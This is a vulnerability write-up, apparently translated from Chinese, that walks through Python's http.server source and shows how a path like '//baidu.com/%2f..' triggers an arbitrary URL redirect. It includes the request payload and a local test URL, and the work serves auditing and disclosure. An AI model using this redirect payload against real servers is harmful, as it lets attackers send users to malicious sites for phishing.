Python http.server URL Redirect

Source code analysis

As we all know, Python has a one-click method to start the web server:

python3 -m http.server port

Execute the above command in any directory to start a web file server. This method uses the http.server module, which contains the following important classes:

The HTTPServer class inherits from socketserver.TCPServer, indicating that the HTTP server is actually a TCP server
BaseHTTPRequestHandler, this is a Handler that handles the content of the TCP protocol. The purpose is to parse the data obtained from the TCP stream according to the HTTP protocol, and return the corresponding data packet according to the HTTP protocol, but this class does not perform any operation after analyzing the data packet. Use it directly. If we want to write our own web application, we can inherit this class and implement the do_XXX and other methods.
SimpleHTTPRequestHandler, this class inherits from BaseHTTPRequestHandler, gets the parsed data packet from the parent class, and returns the path requested by the user to the user, which is equivalent to implementing a static file server
CGIHTTPRequestHandler, this class inherits from SimpleHTTPRequestHandler, on the basis of the static file server, the function of executing CGI scripts is added

Simply put, it is as follows:

+-----------+ +------------------------+
| TCPServer | | BaseHTTPRequestHandler |
+-----------+ +------------------------+
^ |
| v
| +--------------------------+
+----------------| SimpleHTTPRequestHandler |
| +--------------------------+
| |
| v
| +-----------------------+
+-----------------| CGIHTTPRequestHandler |
+-----------------------+

Let's take a look at the source code of SimpleHTTPRequestHandler:

class SimpleHTTPRequestHandler(BaseHTTPRequestHandler):

    """Simple HTTP request handler with GET and HEAD commands.

    This serves files from the current directory and any of its
    subdirectories.  The MIME type for files is determined by
    calling the .guess_type() method.

    The GET and HEAD requests are identical except that the HEAD
    request omits the actual contents of the file.

    """

    server_version = "SimpleHTTP/" + __version__

    def __init__(self, *args, directory=None, **kwargs):
        if directory is None:
            directory = os.getcwd()
        self.directory = directory
        super().__init__(*args, **kwargs)

    def do_GET(self):
        """Serve a GET request."""
        f = self.send_head()
        if f:
            try:
                self.copyfile(f, self.wfile)
            finally:
                f.close()

    def do_HEAD(self):
        """Serve a HEAD request."""
        f = self.send_head()
        if f:
            f.close()

    def send_head(self):
        """Common code for GET and HEAD commands.

        This sends the response code and MIME headers.

        Return value is either a file object (which has to be copied
        to the outputfile by the caller unless the command was HEAD,
        and must be closed by the caller under all circumstances), or
        None, in which case the caller has nothing further to do.

        """
        path = self.translate_path(self.path)
        f = None
        if os.path.isdir(path):
            parts = urllib.parse.urlsplit(self.path)
            if not parts.path.endswith('/'):
                # redirect browser - doing basically what apache does
                self.send_response(HTTPStatus.MOVED_PERMANENTLY)
                new_parts = (parts[0], parts[1], parts[2] + '/',
                             parts[3], parts[4])
                new_url = urllib.parse.urlunsplit(new_parts)
                self.send_header("Location", new_url)
                self.end_headers()
                return None
            for index in "index.html", "index.htm":
                index = os.path.join(path, index)
                if os.path.exists(index):
                    path = index
                    break
            else:
                return self.list_directory(path)
        ctype = self.guess_type(path)
        try:
            f = open(path, 'rb')
        except OSError:
            self.send_error(HTTPStatus.NOT_FOUND, "File not found")
            return None

        try:
            fs = os.fstat(f.fileno())
            # Use browser cache if possible
            if ("If-Modified-Since" in self.headers
                    and "If-None-Match" not in self.headers):
                # compare If-Modified-Since and time of last file modification
                try:
                    ims = email.utils.parsedate_to_datetime(
                        self.headers["If-Modified-Since"])
                except (TypeError, IndexError, OverflowError, ValueError):
                    # ignore ill-formed values
                    pass
                else:
                    if ims.tzinfo is None:
                        # obsolete format with no timezone, cf.
                        # https://tools.ietf.org/html/rfc7231#section-7.1.1.1
                        ims = ims.replace(tzinfo=datetime.timezone.utc)
                    if ims.tzinfo is datetime.timezone.utc:
                        # compare to UTC datetime of last modification
                        last_modif = datetime.datetime.fromtimestamp(
                            fs.st_mtime, datetime.timezone.utc)
                        # remove microseconds, like in If-Modified-Since
                        last_modif = last_modif.replace(microsecond=0)

                        if last_modif <= ims:
                            self.send_response(HTTPStatus.NOT_MODIFIED)
                            self.end_headers()
                            f.close()
                            return None

            self.send_response(HTTPStatus.OK)
            self.send_header("Content-type", ctype)
            self.send_header("Content-Length", str(fs[6]))
            self.send_header("Last-Modified",
                self.date_time_string(fs.st_mtime))
            self.end_headers()
            return f
        except:
            f.close()
            raise
...

The part of the previous HTTP analysis is no longer analyzed. If we request the GET method, it will be assigned to the do_GET function, and the send_head() method is called in do_GET()

In send_head(), self.translate_path(self.path) is called to perform a standardized operation on the request path. The purpose is to obtain the file actually requested by the user. If the path is an existing directory, enter the if statement. If the user requests If the path does not end with /, enter the second if statement. In this statement, the HTTP jump operation is performed. This is the key point of our current vulnerability:

Vulnerability recurrence

In mainstream browsers such as chrome and firefox, if the URL starts with //domain, the browser will assume that this URL is the protocol of the current packet by default. For example, when we visit http://example.com/ in the browser /baidu.com/, the browser will default to think that you want to jump to http://baidu.com instead of jumping to the .//baidu.com/ directory, so if the request we send is GET // baidu.com HTTP/1.0\r\n\r\n, then it will be redirected to //baidu.com/, and an arbitrary URL redirection vulnerability is generated.

Here, because the directory baidu.com does not exist, we also need to bypass the if statement if os.path.isdir(path), and the bypass method is also very simple, because baidu.com does not exist, we jump to the above One level of directory can be:

GET //baidu.com/%2f.. HTTP/1.0\r\n\r\n

Let's do a simple test, start a http.server service in the local test directory:

Then visit http://127.0.0.1:1234//baidu.com%2f in the browser. You can find that you have jumped to http://www.baidu.com/search/error.html

Vulnerability value

Although the python core inventory has this vulnerability, usually no one uses python -m http.server directly in the production environment, but we can pay attention to some request processing when doing similar audits, and check if there are some doGet and doPost. Inherit and use the SimpleHTTPRequestHandler class, if any, you can perform further analysis to see if it can be used~